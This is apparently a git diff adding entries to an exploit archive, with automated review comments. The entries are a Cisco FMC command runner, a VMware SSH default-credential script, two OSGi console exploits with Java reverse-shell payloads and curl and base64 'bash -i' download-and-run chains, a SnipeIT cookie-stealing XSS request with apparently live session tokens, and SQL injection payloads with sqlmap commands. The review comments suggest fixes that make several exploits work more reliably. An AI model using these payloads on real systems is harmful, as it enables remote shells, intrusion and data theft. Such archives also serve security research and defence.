diff --git a/exploits/hardware/webapps/51881.py b/exploits/hardware/webapps/51881.py
new file mode 100755
index 000000000..86f218261
--- /dev/null
+++ b/exploits/hardware/webapps/51881.py
@@ -0,0 +1,117 @@ +# Exploit Title: [Cisco Firepower Management Center] +# Google Dork: [non] +# Date: [12/06/2023] +# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly) +# Version: [6.2.3.18", "6.4.0.16", "6.6.7.1] +# CVE : [CVE-2023-20048] + +import requests +import json + +# set the variables for the URL, username, and password for the FMC web services interface +fmc_url = "https://fmc.example.com" +fmc_user = "admin" +fmc_pass = "cisco123" + +# create a requests session to handle cookies and certificate verification +session = requests.Session() +session.verify = False + +# send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh token +token_url = fmc_url + "/api/fmc_platform/v1/auth/generatetoken" +response = session.post(token_url, auth=(fmc_user, fmc_pass)) + +# check the response status and extract the access token and refresh token from the response headers +# set the access token as the authorization header for the subsequent requests +try: + if response.status_code == 200: + access_token = response.headers["X-auth-access-token"] + refresh_token = response.headers["X-auth-refresh-token"] + session.headers["Authorization"] = access_token + else: + print("Failed to get tokens, status code: " + str(response.status_code)) + exit() +except Exception as e: + print(e) + exit() + +# set the variable for the domain id +# change this to your domain id +domain_id = "e276abec-e0f2-11e3-8169-6d9ed49b625f" + +# send a GET request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords endpoint to get the list of devices managed by FMC +devices_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords" +response = session.get(devices_url) + +# check the response status and extract the data as a json object +try: + if response.status_code == 200: + data = response.json() + else: + print("Failed to get devices, status code: " + str(response.status_code)) + 
exit() +except Exception as e: + print(e) + exit() + +# parse the data to get the list of device names and URLs +devices = [] +for item in data["items"]: + device_name = item["name"] + device_url = item["links"]["self"] + devices.append((device_name, device_url)) + +# loop through the list of devices and send a GET request to the URL of each device to get the device details +for device in devices: + device_name, device_url = device + response = session.get(device_url) + + # check the response status and extract the data as a json object + try: + if response.status_code == 200: + data = response.json() + else: + print("Failed to get device details, status code: " + str(response.status_code)) + continue + except Exception as e: + print(e) + continue + + # parse the data to get the device type, software version, and configuration URL + device_type = data["type"] + device_version = data["metadata"]["softwareVersion"] + config_url = data["metadata"]["configURL"] + + # check if the device type is FTD and the software version is vulnerable to the CVE-2023-20048 vulnerability + # use the values from the affected products section in the security advisory + if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]: + print("Device " + device_name + " is vulnerable to CVE-2023-20048") + + # create a list of commands that you want to execute on the device + commands = ["show version", "show running-config", "show interfaces"] + device_id = device_url.split("/")[-1] + + # loop through the list of commands and send a POST request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords/{DEVICE_ID}/operational/command/{COMMAND} endpoint to execute each command on the device + # replace {DOMAIN_UUID} with your domain id, {DEVICE_ID} with your device id, and {COMMAND} with the command you want to execute + for command in commands: + command_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords/" + device_id + 
"/operational/command/" + command + response = session.post(command_url) + + # check the response status and extract the data as a json object + try: + if response.status_code == 200: + data = response.json() + else: + print("Failed to execute command, status code: " + str(response.status_code)) + continue + except Exception as e: + print(e) + continue + + # parse the data to get the result of the command execution and print it + result = data["result"] + print("Command: " + command) + print("Result: " + result) + + else: + print("Device " + device_name + " is not vulnerable to CVE-2023-20048") \ No newline at end of file diff --git a/exploits/multiple/remote/51882.py b/exploits/multiple/remote/51882.py new file mode 100755 index 000000000..86882d5ef --- /dev/null +++ b/exploits/multiple/remote/51882.py 
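Review bot: The version gate `if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]` at the end of the device loop marks exactly the three releases named in the file header as vulnerable, while the index row added in the same commit describes the target as `< 6.6.7.1`, so one of the two is wrong; a real comparison such as `tuple(map(int, device_version.split("."))) < (6, 6, 7, 1)`, with the bounds taken from the vendor advisory, would make the intent unambiguous. The token is read from the `X-auth-access-token` response header but replayed as `Authorization`; verify the FMC API does not expect it back under the same `X-auth-access-token` header, in which case every later request would fail. `command` contains spaces and is concatenated raw into the URL path; pass it through `urllib.parse.quote(command, safe="")`. Credentials and `fmc_url` are hard-coded and `session.verify = False` is set unconditionally; take them from `argparse` and make the certificate-check bypass an explicit flag. Everything after login is a call to the operational-command endpoint with valid admin credentials, so as written this is a post-auth command runner; the header should state what an authenticated user can do here that the fixed release prevents, otherwise the CVE reference is unsupported.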
@@ -0,0 +1,75 @@ +# Exploit Title: [VMware Cloud Director | Bypass identity verification] +# Google Dork: [non] +# Date: [12/06/2023] +# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly) +# Version: [10.5] +# CVE : [CVE-2023-34060] +import requests +import paramiko +import subprocess +import socket +import argparse +import threading + +# Define a function to check if a port is open +def is_port_open(ip, port): + # Create a socket object + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + # Set the timeout to 1 second + s.settimeout(1) + # Try to connect to the port + try: + s.connect((ip, port)) + # The port is open + return True + except: + # The port is closed + return False + finally: + # Close the socket + s.close() + +# Define a function to exploit a vulnerable device +def exploit_device(ip, port, username, password, command): + # Create a ssh client object + client = paramiko.SSHClient() + # Set the policy to accept any host key + client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + # Connect to the target using the credentials + client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False) + # Execute the command and get the output + stdin, stdout, stderr = client.exec_command(command) + # Print the output + print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}") + # Close the ssh connection + client.close() + + +# Parse the arguments from the user +parser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director") +parser.add_argument("ip", help="The target IP address") +parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check") +parser.add_argument("-u", "--username", default="root", help="The username for ssh") +parser.add_argument("-w", "--password", default="vmware", help="The password for ssh") +parser.add_argument("-c", 
"--command", default="hostname", help="The command to execute on the vulnerable devices") +args = parser.parse_args() + +# Loop through the ports and check for the vulnerability +for port in args.ports: + # Check if the port is open + if is_port_open(args.ip, port): + # The port is open, send a GET request to the port and check the status code + response = requests.get(f"http://{args.ip}:{port}") + if response.status_code == 200: + # The port is open and vulnerable + print(f"Port {port} is vulnerable to CVE-2023-34060") + # Create a thread to exploit the device + thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command)) + # Start the thread + thread.start() + else: + # The port is open but not vulnerable + print(f"Port {port} is not vulnerable to CVE-2023-34060") + else: + # The port is closed + print(f"Port {port} is closed") \ No newline at end of file diff --git a/exploits/multiple/webapps/51878.py b/exploits/multiple/webapps/51878.py new file mode 100755 index 000000000..8052d0631 --- /dev/null +++ b/exploits/multiple/webapps/51878.py 
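Review bot: `exploit_device` ignores its `username` and `password` parameters and always calls `client.connect(ip, port, "root", "vmware", ...)`, so the `-u`/`-w` options are dead; it should read `client.connect(ip, port, username, password, allow_agent=False, look_for_keys=False)`. The detection step `requests.get(f"http://{args.ip}:{port}")` is also run against port 22, where an SSH daemon will not answer with an HTTP 200, and a refused or non-HTTP reply raises `requests.exceptions.ConnectionError`, which nothing catches, so the scan aborts instead of printing "not vulnerable"; if 5480 only speaks TLS a plain `http://` probe will not reach it either. Paramiko's `AuthenticationException`/`SSHException` inside the worker thread is likewise unhandled and the threads are never joined, so failures surface as tracebacks after the main thread has exited. `is_port_open` should catch `OSError` rather than a bare `except:`, and `subprocess` is imported but unused. As written the "bypass" is an SSH login with a default root password; the header should say under what version or precondition this login is expected to succeed and how that relates to CVE-2023-34060.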
@@ -0,0 +1,290 @@ +#!/usr/bin/python + +# Exploit Title: [OSGi v3.8-3.18 Console RCE] +# Date: [2023-07-28] +# Exploit Author: [Andrzej Olchawa, Milenko Starcik, +# VisionSpace Technologies GmbH] +# Exploit Repository: +# [https://github.com/visionspacetec/offsec-osgi-exploits.git] +# Vendor Homepage: [https://eclipse.dev/equinox] +# Software Link: [https://archive.eclipse.org/equinox/] +# Version: [3.8 - 3.18] +# Tested on: [Linux kali 6.3.0-kali1-amd64] +# License: [MIT] +# +# Usage: +# python exploit.py --help +# +# Example: +# python exploit.py --rhost=192.168.0.133 --rport=1337 --lhost=192.168.0.100 \ +# --lport=4444 + +""" +This is an exploit that allows to open a reverse shell connection from +the system running OSGi v3.8-3.18 and earlier. +""" +import argparse +import socket +import sys +import threading + +from functools import partial +from http.server import BaseHTTPRequestHandler, HTTPServer + +# Stage 1 of the handshake message +HANDSHAKE_STAGE_1 = \ + b"\xff\xfd\x01\xff\xfd" \ + b"\x03\xff\xfb\x1f\xff" \ + b"\xfa\x1f\x00\x74\x00" \ + b"\x37\xff\xf0\xff\xfb" \ + b"\x18" + +# Stage 2 of the handshake message +HANDSHAKE_STAGE_2 = \ + b"\xff\xfa\x18\x00\x58" \ + b"\x54\x45\x52\x4d\x2d" \ + b"\x32\x35\x36\x43\x4f" \ + b"\x4c\x4f\x52\xff\xf0" + +# The buffer of this size is enough to handle the telnet handshake +BUFFER_SIZE = 2 * 1024 + + +class HandlerClass(BaseHTTPRequestHandler): + """ + This class overrides the BaseHTTPRequestHandler. It provides a specific + functionality used to deliver a payload to the target host. + """ + + _lhost: str + _lport: int + + def __init__(self, lhost, lport, *args, **kwargs): + self._lhost = lhost + self._lport = lport + + super().__init__(*args, **kwargs) + + def _set_response(self): + self.send_response(200) + self.send_header("Content-type", "text/html") + self.end_headers() + + def do_GET(self): # pylint: disable=C0103 + """ + This method is responsible for the playload delivery. 
+ """ + + print("Delivering the payload...") + + self._set_response() + self.wfile.write(generate_revshell_payload( + self._lhost, self._lport).encode('utf-8')) + + raise KeyboardInterrupt + + def log_message(self, format, *args): # pylint: disable=W0622 + """ + This method redefines a built-in method to suppress + BaseHTTPRequestHandler log messages. + """ + + return + + +def generate_revshell_payload(lhost, lport): + """ + This function generates the Revershe Shell payload that will + be executed on the target host. + """ + + payload = \ + "import java.io.IOException;import java.io.InputStream;" \ + "import java.io.OutputStream;import java.net.Socket;" \ + "class RevShell {public static void main(String[] args) " \ + "throws Exception { String host=\"%s\";int port=%d;" \ + "String cmd=\"sh\";Process p=new ProcessBuilder(cmd)." \ + "redirectErrorStream(true).start();Socket s=new Socket(host,port);" \ + "InputStream pi=p.getInputStream(),pe=p.getErrorStream(), " \ + "si=s.getInputStream();OutputStream po=p.getOutputStream()," \ + "so=s.getOutputStream();while(!s.isClosed()){while(pi.available()" \ + ">0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());" \ + "while(si.available()>0)po.write(si.read());so.flush();po.flush();" \ + "Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};" \ + "p.destroy();s.close();}}\n" % ( + lhost, lport) + + return payload + + +def run_payload_delivery(lhost, lport): + """ + This function is responsible for payload delivery. 
+ """ + + print("Setting up the HTTP server for payload delivery...") + + handler_class = partial(HandlerClass, lhost, lport) + + server_address = ('', 80) + httpd = HTTPServer(server_address, handler_class) + + try: + print("[+] HTTP server is running.") + + httpd.serve_forever() + except KeyboardInterrupt: + print("[+] Payload delivered.") + except Exception as err: # pylint: disable=broad-except + print("[-] Failed payload delivery!") + print(err) + finally: + httpd.server_close() + + +def generate_stage_1(lhost): + """ + This function generates the stage 1 of the payload. + """ + + stage_1 = b"fork \"curl http://%s -o ./RevShell.java\"\n" % ( + lhost.encode() + ) + + return stage_1 + + +def generate_stage_2(): + """ + This function generates the stage 2 of the payload. + """ + + stage_2 = b"fork \"java ./RevShell.java\"\n" + + return stage_2 + + +def establish_connection(rhost, rport): + """ + This function creates a socket and establishes the connection + to the target host. + """ + + print("[*] Connecting to OSGi Console...") + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((rhost, rport)) + print("[+] Connected.") + + return sock + + +def process_handshake(sock): + """ + This function process the handshake with the target host. + """ + + print("[*] Processing the handshake...") + sock.recv(BUFFER_SIZE) + sock.send(HANDSHAKE_STAGE_1) + sock.recv(BUFFER_SIZE) + sock.send(HANDSHAKE_STAGE_2) + sock.recv(BUFFER_SIZE) + sock.recv(BUFFER_SIZE) + + +def deliver_payload(sock, lhost): + """ + This function executes the first stage of the exploitation. + It triggers the payload delivery mechanism to the target host. + """ + + stage_1 = generate_stage_1(lhost) + + print("[*] Triggering the payload delivery...") + sock.send(stage_1) + sock.recv(BUFFER_SIZE) + sock.recv(BUFFER_SIZE) + + +def execute_payload(sock): + """ + This function executes the second stage of the exploitation. + It sends payload which is responsible for code execution. 
+ """ + + stage_2 = generate_stage_2() + + print("[*] Executing the payload...") + sock.send(stage_2) + sock.recv(BUFFER_SIZE) + sock.recv(BUFFER_SIZE) + print("[+] Payload executed.") + + +def exploit(args, thread): + """ + This function sends the multistaged payload to the tareget host. + """ + + try: + sock = establish_connection(args.rhost, args.rport) + + process_handshake(sock) + deliver_payload(sock, args.lhost) + + # Join the thread running the HTTP server + # and wait for payload delivery + thread.join() + + execute_payload(sock) + + sock.close() + + print("[+] Done.") + except socket.error as err: + print("[-] Could not connect!") + print(err) + sys.exit() + + +def parse(): + """ + This fnction is used to parse and return command-line arguments. + """ + + parser = argparse.ArgumentParser( + prog="OSGi-3.8-console-RCE", + description="This tool will let you open a reverse shell from the " + "system that is running OSGi with the '-console' " + "option in versions between 3.8 and 3.18.", + epilog="Happy Hacking! :)", + ) + + parser.add_argument("--rhost", dest="rhost", + help="remote host", type=str, required=True) + parser.add_argument("--rport", dest="rport", + help="remote port", type=int, required=True) + parser.add_argument("--lhost", dest="lhost", + help="local host", type=str, required=False) + parser.add_argument("--lport", dest="lport", + help="local port", type=int, required=False) + parser.add_argument("--version", action="version", + version="%(prog)s 0.1.0") + + return parser.parse_args() + + +def main(args): + """ + Main fuction. + """ + + thread = threading.Thread( + target=run_payload_delivery, args=(args.lhost, args.lport)) + thread.start() + + exploit(args, thread) + + +if __name__ == "__main__": + main(parse()) \ No newline at end of file diff --git a/exploits/multiple/webapps/51879.py b/exploits/multiple/webapps/51879.py new file mode 100755 index 000000000..2c992cb68 --- /dev/null +++ b/exploits/multiple/webapps/51879.py 
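Review bot: `--lhost` and `--lport` are declared `required=False`, but `run_payload_delivery`, `generate_revshell_payload` and `generate_stage_1` use both unconditionally (`lhost.encode()` raises `AttributeError` on `None`, by which time the HTTP thread is already running), so either mark them `required=True` or validate them in `parse()`. The delivery server is hard-wired to `server_address = ('', 80)`, which needs root on Linux and must match the port-less `http://%s` in `generate_stage_1`; an option for the HTTP port, formatted into both places, would remove that hidden coupling. `thread.join()` in `exploit` blocks forever if the target never fetches `RevShell.java`; `thread.join(timeout=...)` followed by an `is_alive()` check gives the operator a failure instead of a hang. Stopping the server by raising `KeyboardInterrupt` from `do_GET` appears to work only because `HTTPServer` re-raises non-`Exception` errors out of `serve_forever()`; calling `self.server.shutdown()` from another thread, or serving a single `handle_request()`, is the conventional way and deserves at least a comment.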
@@ -0,0 +1,144 @@ +#!/usr/bin/python + +# Exploit Title: [OSGi v3.7.2 Console RCE] +# Date: [2023-07-28] +# Exploit Author: [Andrzej Olchawa, Milenko Starcik, +# VisionSpace Technologies GmbH] +# Exploit Repository: +# [https://github.com/visionspacetec/offsec-osgi-exploits.git] +# Vendor Homepage: [https://eclipse.dev/equinox] +# Software Link: [https://archive.eclipse.org/equinox/] +# Version: [3.7.2 and before] +# Tested on: [Linux kali 6.3.0-kali1-amd64] +# License: [MIT] +# +# Usage: +# python exploit.py --help +# +# Examples: +# python exploit.py --rhost=localhost --rport=1337 --lhost=localhost \ +# --lport=4444 +# +# python exploit.py --rhost=localhost --rport=1337 --payload= \ +# "curl http://192.168.100.100/osgi_test" + + +""" +This is an exploit that allows to open a reverse shell connection from +the system running OSGi v3.7.2 and earlier. +""" +import argparse +import base64 +import socket + + +def parse(): + """ + This fnction is used to parse and return command-line arguments. + """ + + parser = argparse.ArgumentParser( + prog="OSGi-3.7.2-console-RCE", + description="This tool will let you open a reverse shell from the " + "system that is running OSGi with the '-console' " + "option in version 3.7.2 (or before).", + epilog="Happy Hacking! 
:)", + ) + + parser.add_argument("--rhost", dest="rhost", + help="remote host", type=str, required=True) + parser.add_argument("--rport", dest="rport", + help="remote port", type=int, required=True) + parser.add_argument("--lhost", dest="lhost", + help="local host", type=str, required=False) + parser.add_argument("--lport", dest="lport", + help="local port", type=int, required=False) + parser.add_argument("--payload", dest="custom_payload", + help="custom payload", type=str, required=False) + parser.add_argument("--version", action="version", + version="%(prog)s 0.1.0") + + args = parser.parse_args() + + if args.custom_payload and (args.lhost or args.lport): + parser.error( + "either --payload or both --lport and --rport are required.") + + return args + + +def generate_payload(lhost, lport, custom_payload): + """ + This function generates the whole payload ready for the delivery. + """ + + payload = "" + + if custom_payload: + payload = custom_payload + + print("(*) Using custom payload.") + elif lhost and lport: + payload = \ + "echo 'import java.io.IOException;import java.io.InputStream;" \ + "import java.io.OutputStream;import java.net.Socket;class Rev" \ + "Shell {public static void main(String[] args) throws Excepti" \ + "on { String host=\"%s\";int port=%s;String cmd=\"sh\";Proces" \ + "s p=new ProcessBuilder(cmd).redirectErrorStream(true).start(" \ + ");Socket s=new Socket(host,port);InputStream pi=p.getInputSt" \ + "ream(),pe=p.getErrorStream(), si=s.getInputStream();OutputSt" \ + "ream po=p.getOutputStream(), so=s.getOutputStream();while(!s" \ + ".isClosed()){while(pi.available()>0)so.write(pi.read());whil" \ + "e(pe.available()>0)so.write(pe.read());while(si.available()>" \ + "0)po.write(si.read());so.flush();po.flush();Thread.sleep(50)" \ + ";try {p.exitValue();break;}catch (Exception e){}};p.destroy(" \ + ");s.close();}}' > RevShell.java ; java ./RevShell.java" % ( + lhost, lport) + + print("(+) Using Java reverse shell payload.") + + bash_payload = 
b"bash -c {echo,%s}|{base64,-d}|{bash,-i}" % ( + base64.b64encode(payload.encode())) + + wrapped_payload = b"fork \"%s\"\n" % (bash_payload) + + return wrapped_payload + + +def deliver_payload(rhost, rport, payload): + """ + This function connects to the target host and delivers the payload. + It returns True if successful; False otherwise. + """ + + print("(*) Sending payload...") + + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((rhost, rport)) + sock.send(payload) + sock.close() + except socket.error as err: + print(f"(-) Could not deliver the payload to {rhost}:{rport}!") + print(err) + return False + + return True + + +def main(args): + """ + Main function. + """ + + payload = generate_payload(args.lhost, args.lport, args.custom_payload) + + success = deliver_payload(args.rhost, args.rport, payload) + if success: + print("(+) Done.") + else: + print("(-) Finished with errors.") + + +if __name__ == "__main__": + main(parse()) \ No newline at end of file diff --git a/exploits/multiple/webapps/51883.txt b/exploits/multiple/webapps/51883.txt new file mode 100644 index 000000000..fa7ff6043 --- /dev/null +++ b/exploits/multiple/webapps/51883.txt 
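Review bot: The argument check in `parse()` is inverted: `if args.custom_payload and (args.lhost or args.lport)` only errors when both forms are given, so running with neither `--payload` nor `--lhost`/`--lport` passes validation, `generate_payload` leaves `payload = ""`, and an empty `bash -c {echo,}|{base64,-d}|{bash,-i}` is sent to the target. It should be `if not args.custom_payload and not (args.lhost and args.lport): parser.error("either --payload or both --lhost and --lport are required.")` (the current message also says `--rport` where `--lhost` is meant). `deliver_payload` uses `sock.send`, which may write only part of the buffer; use `sock.sendall` and close the socket in a `finally` or `with` block, since a failed `send` currently leaves it open. Unlike the 3.8-3.18 exploit in this commit, this one writes the `fork` line without any telnet negotiation or reading the console banner; if that is intentional for 3.7.2 a one-line comment saying so would help.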
@@ -0,0 +1,56 @@ +Exploit Title: SnipeIT 6.2.1 - Stored Cross Site Scripting +Date: 06-Oct-2023 +Exploit Author: Shahzaib Ali Khan +Vendor Homepage: https://snipeitapp.com +Software Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1 +Version: 6.2.1 +Tested on: Windows 11 22H2 and Ubuntu 20.04 +CVE: CVE-2023-5452 + +Description: SnipeIT 6.2.1 is affected by a stored cross-site scripting +(XSS) feature that allows attackers to execute JavaScript commands. The +location endpoint was vulnerable. + +Steps to Reproduce: + +1. Login as a standard user [non-admin] > Asset page > List All +2. Click to open any asset > Edit Asset +3. Create new location and add the payload: + +4. Now login to any other non-admin or admin > Asset page > List All +5. Open the same asset of which you can change the location and the payload +will get executed. + +POC Request: + +POST /api/v1/locations HTTP/1.1 +Host: localhost +Content-Length: 118 +Accept: */* +X-CSRF-TOKEN: CDJkvGNWzFKFueeNx0AQMJIhhXJGZmKG1SFeVEGV +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Origin: http://localhost +Referer: http://localhost/hardware/196/edit +Accept-Encoding: gzip, deflate, br +Accept-Language: en-US,en;q=0.9 +Cookie: snipeit_session=AHw3ARN6pdg90xU4ovG1FBZywycKPLIxjTUfmELO; +assetsListingTable.bs.table.cardView=false; laravel_token= +eyJpdiI6IitpM1RXVEVEVGNLZzRTd28wYmhZblE9PSIsInZhbHVlIjoickJocmNYTzNOS3JYdkdhSmpJME1GRmJYMi9DUnVkaStDTzBnbHZDVG1xNVAvbTA5cjJHM1FTbi95SEVzNmNnNzdKNHY5em5pK3 +ZjQ2F3VnB6RnhJRCs4NkV6NW16RnRWb3M0cXBuT2ZpZExoQ3JrN1VIVHB3cWV5NUtBRWZ4OXBsdEx4R0hSeElLV1BEbWk2WGxiWEBOMDg5cGFySj1rSnENckx3bXg2Qi9KQzFvNGJJTktjTVUw0EI4YVNM +d2UxdW1TelBDV1ByUk9yeTFOUDR1cS9SV2tFRi9LOG1iZGVweUxJdGhHTXRLSnFvTU82QVIvREphS215bkRtKzM5M1RVQ21nVENsT1M1Mn1FUT1TbFkOVDVPbHd4a3BFQW1YQkY3NFR2bzRQSGZIelppa0 
+01MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D; +XSRF-TOKEN= +eyJpdiI6IjNmMVpNUEpDNCtpV0pHKOczZDRSUmc9PSIsInZhbHVlIjoiWXYvZkY2bTk4MONsUUFZQjZiVWtPdm1JRE1WWmpBd2tsZWNJblgxZWg3dONYL2x0Zkxib3N5Y1N5YmRYVm1XUm91N3pES1F1bH +FWMEV1Y2xsZ1VqZ1FYdmdYcjJRZXZMZG9NYmpWY2htL2tPdXNBQUdEbjVHSEVjV2tzKOpYelEiLCJtYWMi0iI1YzhkNmQ2NDAxNmZkYTQ1NzVhZmI5OGY3ODA3MDkOOTc4ZWVhYmMiZWIYMjZhZGZiZWI5 +MjMOMGJjZDBkNzU4IiwidGFnIjoiIn0%3D +Connection: close + +name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&city=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&country= + + + +Thanks, +Shahzaib Ali Khan \ No newline at end of file diff --git a/exploits/php/webapps/51877.txt b/exploits/php/webapps/51877.txt new file mode 100644 index 000000000..6432035b4 --- /dev/null +++ b/exploits/php/webapps/51877.txt 
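Review bot: Step 3 of the reproduction says "add the payload:" but no payload follows; the `name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E` value in the POC body appears to be what was meant, so state it there, e.g. `<script>alert(document.cookie)</script>` in the location name and city fields. The request includes what look like live `snipeit_session`, `laravel_token` and `XSRF-TOKEN` cookie values and an `X-CSRF-TOKEN`; these should be redacted or truncated in a published advisory. "affected by a stored cross-site scripting (XSS) feature" should read "vulnerability", and "The location endpoint was vulnerable" would be clearer as "The `POST /api/v1/locations` endpoint stores the `name` and `city` fields without sanitisation", which is what the POC request injects.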
@@ -0,0 +1,24 @@ +# Exploit Title: Human Resource Management System - SQL Injection +# Date: 13-01-2024 +# Exploit Author: Srikar ( Exp1o1t9r ) +# Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html +# Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html +# https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip +# Version: 1.0 (Monday, October 10, 2022 - 13:37) +# Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0 +# Vulnerable URL and Parameter:URL: + + +Parameter: employeeid=2 The following payloads successfully identified SQL injection +vulnerabilities: +employeeid=2' AND 9667=9667-- NFMgemployeeid=2' AND (SELECT +6014 FROM(SELECT COUNT(*),CONCAT(0x716a767671,(SELECT +(ELT(6014=6014,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ywfiemployeeid=2' AND (SELECT +7160 FROM (SELECT(SLEEP([SLEEPTIME])))IzXD)-- ninWemployeeid=-4254' UNION +ALL SELECT +NULL,CONCAT(0x716a767671,0x457977584e79636568687641497a4b6e637668455a487948534e50737753626f5a4a545244616276,0x7162716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- +- * + +# Response:MySQL: 10.4.32-MariaDB +Users:'pma'@'localhost''root'@'127.0.0.1''root'@'::1''root'@'localhost'* \ No newline at end of file diff --git a/exploits/php/webapps/51880.txt b/exploits/php/webapps/51880.txt new file mode 100644 index 000000000..6c9cf5e36 --- /dev/null +++ b/exploits/php/webapps/51880.txt 
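Review bot: The "Vulnerable URL and Parameter" line is empty, so the affected script is never named and the finding cannot be reproduced from this advisory; state the script path and HTTP method that consume `employeeid`. The four sqlmap payloads are run together on one line ("-- NFMgemployeeid=2' AND ...") and should be separated, with `[SLEEPTIME]` replaced by the value actually used. The "Response" section would also be easier to read as a short sqlmap excerpt, one item per line, rather than the joined `Users:'pma'@'localhost''root'@...` string.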
@@ -0,0 +1,72 @@ ++ **Exploit Title:** CVE-2023-7137_Client_Details_System-SQL_Injection_1 ++ **Date:** 2023-26-12 ++ **Exploit Author:** Hamdi Sevben ++ **Vendor Homepage:** https://code-projects.org/client-details-system-in-php-with-source-code/ ++ **Software Link:** https://download-media.code-projects.org/2020/01/CLIENT_DETAILS_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip ++ **Version:** 1.0 ++ **Tested on:** Windows 10 Pro + PHP 8.1.6, Apache 2.4.53 ++ **CVE:** CVE-2023-7137 + +## References: ++ **CVE-2023-7137:** https://vuldb.com/?id.249140 ++ https://www.cve.org/CVERecord?id=CVE-2023-7137 ++ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7137 ++ https://nvd.nist.gov/vuln/detail/CVE-2023-7137 + +## Description: +Client Details System 1.0 allows SQL Injection via parameter 'uemail' in "/clientdetails/". Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latest vulnerabilities in the underlying database. + +## Proof of Concept: ++ Go to the User Login page: "http://localhost/clientdetails/" ++ Fill email and password. ++ Intercept the request via Burp Suite and send to Repeater. ++ Copy and paste the request to a "r.txt" file. ++ Captured Burp request: +``` +POST /clientdetails/ HTTP/1.1 +Host: localhost +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: en-us,en;q=0.5 +Cache-Control: no-cache +Content-Length: 317 +Content-Type: application/x-www-form-urlencoded +Referer: http://localhost/clientdetails/ +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 + +uemail=user@mail.com&login=LOG+IN&password=P@ass123 +``` + ++ Use sqlmap to exploit. In sqlmap, use 'uemail' parameter to dump the database. 
+``` +python sqlmap.py -r r.txt -p uemail --risk 3 --level 5 --threads 1 --random-agent tamper=between,randomcase --proxy="http://127.0.0.1:8080" --dbms mysql --batch --current-db +``` + +``` +--- +Parameter: uemail (POST) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause (NOT) + Payload: uemail=user@mail.com' OR NOT 6660=6660-- FlRf&login=LOG IN&password=P@ass123 + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: uemail=user@mail.com' AND (SELECT 6854 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6854=6854,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Oxlo&login=LOG IN&password=P@ass123 + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: uemail=user@mail.com' AND (SELECT 5335 FROM (SELECT(SLEEP(5)))qsPA)-- pwtE&login=LOG IN&password=P@ass123 + + Type: UNION query + Title: Generic UNION query (NULL) - 7 columns + Payload: uemail=user@mail.com' UNION ALL SELECT NULL,CONCAT(0x717a717a71,0x45575259495444506f48756469467471555975554d6f794d77677a4f50547145735052567278434f,0x7176627871),NULL,NULL,NULL,NULL,NULL-- -&login=LOG IN&password=P@ass123 +--- +[14:58:11] [INFO] the back-end DBMS is MySQL +web application technology: Apache 2.4.53, PHP, PHP 8.1.6 +back-end DBMS: MySQL >= 5.0 (MariaDB fork) +[14:58:11] [INFO] fetching current database +current database: 'loginsystem' +``` + ++ current database: `loginsystem` +![1](https://github.com/h4md153v63n/CVEs/assets/5091265/bfbec122-5b56-42df-beda-41dfdcaf527a) \ No newline at end of file diff --git 